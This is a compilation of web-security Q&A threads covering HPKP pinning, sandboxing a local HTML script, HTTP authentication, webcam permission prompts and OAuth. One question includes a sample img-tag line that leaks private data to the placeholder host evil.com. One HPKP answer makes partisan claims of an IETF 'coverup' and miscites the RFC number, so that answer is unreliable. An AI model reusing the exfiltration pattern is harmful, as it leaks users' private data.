Chrome and Safari not honorring HPKP - google-chrome

I added HPKP header to my site, but it is not honored by Chrome or Safari. I tested it manually by setting a proxy and by going to chrome://net-internals/#hsts and looking for my domain - which did not found. The HPKP seems correct, and I also tested it using HPKP toolset so I know it is valid.
I am thinking I might be doing something weird with my flow. I have a web app, which is served over myapp.example.com. On login, the app redirects the user to authserver.example.com/begin to initiate OpenID Connect Authorization Code flow. HPKP header is returned only from authserver.example.com/begin, and I think this might be the issue. I have include-subdomain in the HPKP header so I think this is not the issue.
This is the HPKP header (line breaks added for readability):
public-key-pins:max-age=864000;includeSubDomains; \
pin-sha256="bcppaSjDk7AM8C/13vyGOR+EJHDYzv9/liatMm4fLdE="; \
pin-sha256="cJjqBxF88mhfexjIArmQxvZFqWQa45p40n05C6X/rNI="; \
report-uri="https://reporturl.example"
Thanks!

I added HPKP header to my site, but it is not honored by Chrome or Safari... I tested it manually by setting a proxy...
RFC 7469, Public Key Pinning Extension for HTTP, kind of sneaks that past you. The IETF published it with overrides, so an attacker can break a known good pinset. Its mentioned once in the standard by name "override" but the details are not provided. The IETF also failed to publish a discussion in a security considerations section.
More to the point, the proxy you set engaged the override. It does not matter if its the wrong proxy, a proxy certificate installed by an mobile device OEM, or a proxy controlled by an attacker who tricked a user to install it. The web security model and the standard allow it. They embrace interception and consider it a valid use case.
Something else they did was make the reporting of the broken pinset a Must Not or Should Not. It means the user agent is complicit in the coverup, too. That's not discussed in a security considerations section, either. They really don't want folks to know their supposed secure connection is being intercepted.
Your best bet to avoid it is move outside the web security model. Don't use browser based apps when security is a concern. Use a hybrid app and perform the pinning yourself. Your hybrid app can host a WebView Control or View, but still get access to the channel to verify parameters. Also see OWASP's Certificate and Public Key Pinning.
Also see Comments on draft-ietf-websec-key-pinning on the IETF mailing list. One of the suggestions in the comment was change the title to "Public Key Pinning Extension for HTTP with Overrides" to highlight the feature. Not surprisingly, that's not something they want. They are trying to do it surreptitiously without user knowledge.
Here's the relevant text from RFC 6479:
2.7. Interactions with Preloaded Pin Lists
UAs MAY choose to implement additional sources of pinning
information, such as through built-in lists of pinning information.
Such UAs should allow users to override such additional sources,
including disabling them from consideration.
The effective policy for a Known Pinned Host that has both built-in
Pins and Pins from previously observed PKP header response fields is
implementation-defined.

Locally installed CAs (like those used for proxies like you say are running) override any HPKP checks.
This is necessary so as not to completely break the internet given the prevalence of them: anti-virus software and proxies used in large corporations basically MITM https traffic through a locally issued certificate as otherwise they could not read the traffic.
Some argue that locally installing a CA requires access to your machine, and at that point it's game over anyway, but to me this still massively reduces the protection of HPKP and that, coupled with the high risks of using HPKP, means I am really not a fan of it.

Related

How to prevent html in file:/// from accessing internet?

The background scenario is that I want to give my users a javascript which they can use to analyze their sensitive private data, and I want them to feel safe that this data will not be sent to internet.
Initially, I thought I'll just distribute it as an .html file with embeded <script>, and that they'll just run this .html file in browser over file:/// protocol, which gives some nice same-origin policy defaults.
But, this won't really offer much security to my users: a javascript could easily create an <img src="https://evil.com?sensitive-data=${XYZ}"> tag which would send a GET request to evil.com, despite evil.com being a different origin, because by design embeding of images from different origins is allowed.
Is there some practical way in which I could distribute my javascript and/or for the end user to run such script, so they could be reasonably sure it can't send the data over the internet?
(unpluging the machine from the internet, installing VM, or manipulating firewall settings, are not practical)
(reasonably sure=assumming that the software such us browser they use follows the spec and wasn't hacked)?
Please take a look at Content-Security-Policy subject.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/img-src
Supplementing your html by <meta http-equiv="Content-Security-Policy" content="img-src 'self';"> should disallow browser to make requests to foreign resources.
The alternative attempt could be developing your project in the form of a browser extension, where you can set up content security policy quite precisely, including defines of inline scripting, executing string-to-js methods, frames and fonts origin, and so on ( https://developer.chrome.com/docs/apps/contentSecurityPolicy/ )
As a bonus you (and your users) get a free of charge code review from the security departments of the browsers vendors.
Setting up browser proxy in settings to localhost:DUMMY_PORT looks like safe solution for this case.
Deno is, to cite its website:
Deno is a simple, modern and secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust.
Secure by default. No file, network, or environment access, unless explicitly enabled.
So, this reduces the trust of the user to the trust in deno (and to chocolatey if they want to use choco install deno to install deno).

What are alternatives to HTTP authentication?

My site uses HTTP authentication and I've learned it isn't very secure and it causes a lot of problems for many browsers, and not all browsers may support it, so I want to use an alternative that is secure and more widely supported; what are some alternatives?
Is it possible to lock all directories using an HTML login page?
My site uses HTTP authentication and I've learned it isn't very secure
That's false... unless you're referring to something like basic auth over an insecure channel. In that case, anything over the insecure channel has potential issues. (Even if you did some client-side encryption hackery, you still have the problem that the remote host is not verified without the TLS or SSL layer.)
Basic auth is fine in some cases, and not for others. It depends on what you're trying to do.
it causes a lot of problems for many browsers, and not all browsers may support it
Completely false. I've never seen a browser that didn't support basic auth and digest auth.
what are some alternatives?
This isn't possible to answer without a better understanding of your requirements. Two-factor auth with a DNA sample and a brainwave scan might be more secure but chances are that's not what you're looking for. Besides, you can't forget about the rest of your system and you've told us nothing about that.
Is it possible to lock all directories using an HTML login page?
Yes. How you do this depends on what you're running server-side, but yes it's completely possible and often done.

How to capture image with html5 webcam without security prompt

I need to capture image from web page without security warning.
Page where i need webcam functionality can not be switched to https protocol.
I've installed root certificates and made them trusted.
I tried to insert iframe (which pointed to secure protocol https://mysecurepage.com) inside page (http://mypage.com), but not worked.
#bjelli is correct - this is a major security flaw for any internet content. Just imagine if you could go to a website which would start taking photos/recording everything going on without any permissions or notifications!
However, I am working on an intranet project where disabling the prompt would be quite safe.
If you are in this sort of position - there is one thing you can do;
Google Chrome Policies
If you are deploying the browser, you can override the security prompt for sites you specify. I don't know if you are working in such an environment, but this is the only way you can avoid the prompt all together. Similar things probably would apply for other browsers too.
As defined in http://www.w3.org/TR/mediacapture-streams/
When the getUserMedia() method is called, the user agent MUST run the following
steps:
[9 steps omitted]
Prompt the user in a user agent specific manner for permission to provide the
entry script's origin with a MediaStream object representing a media stream.
[...]
If the user grants permission to use local recording devices, user agents are
encouraged to include a prominent indicator that the devices are "hot" (i.e. an
"on-air" or "recording" indicator).
If the user denies permission, jump to the step labeled failure below. If the
user never responds, this algorithm stalls on this step.
If a browser does not behave as described here it is a serious security problem. If you find a way of making a browser skip the "permission" you have found a security problem.
What do you do if you find a security problem?
Report it IMMEDIATELY! Wikipedia: Vulnerability Disclosure
Firefox: http://www.mozilla.org/security/#For_Developers
Internet Explorer: http://technet.microsoft.com/en-us/security/ff852094.aspx
Safari: https://ssl.apple.com/support/security/
Chrome: http://www.google.com/about/appsecurity/
Opera: http://www.opera.com/security/policy
This is not just a question of technical possibilities, it's also a question of
professional ethics: what kind of job would I not take on? should I be
loyal to my customer or should I think of the welfare of the public? when do I
just follow orders, when do I stop bad stuff from happening, when do I blow the whistle?
Here are some starting points for computing professionals to think about the ethics of their work:
http://www.acm.org/about/se-code
http://www.acm.org/about/code-of-ethics
http://www.ieee.org/about/corporate/governance/p7-8.html
http://www.gi.de/?id=120

Can WebAuthenticationBroker work with persistent cookies?

From the documentation on the WebAuthenticationBroker class, this object appears to exist to support Single-Sign-On scenarios as well as the OAuth2 flow I'm trying to use it for. As part of its behaviour, it seems to create a completely separate browsing environment from the rest of the system and actively purges all the persistent cookies generated via a sign-on process.
This causes me the problem that each time my user enters my application, they will be prompted to sign in with their credentials. This is counter to my expectations around SSO and would seem to make this class unsuitable for most scenarios.
Is there some way to make the cookies persist, as they would do in a normal browser, so that I don't have to 2-factor sign into my Google account yet again?

HTTP DELETE request with extra authentication

I was searching for a solution of the following problem, so far without success: I'm planning a RESTful web service, where certain actions (e.g. DELETE) should require a special authentication.
The idea is, that users have a normal username/password login (session based or Basic Auth, doesn't really matter here) using which they can access the service. Some actions require an additional authentication in form of a PIN code or maybe even a one-time password. Including the extra piece of authentication into the login process is not possible (and would miss the point of the whole exercise).
I thought about special headers (something like X-OTP-Authetication) but that would make it impossible to access the service via a standard HTML page (no means to include a custom header into a link).
Another option was HTTP query parameters, but that seems to be discouraged, especially for DELETE.
Any ideas how to tackle this problem?
From REST Web Service Security with jQuery Front-End
If you haven't already, I'd recommend some reading on OAuth 1.0 and 2.0. They are both used by some of the bigger API, such as Facebook, Netflix, Twitter, and more. 2.0 is still in draft, but that hasn't stopped anyone from implementing it and using it as it is more simple for a client to use. It sounds like you want something more complicated and more secure, so you might want to focus on 1.0.
I always found Netflix's Authentication Overview to be a good explanation for clients.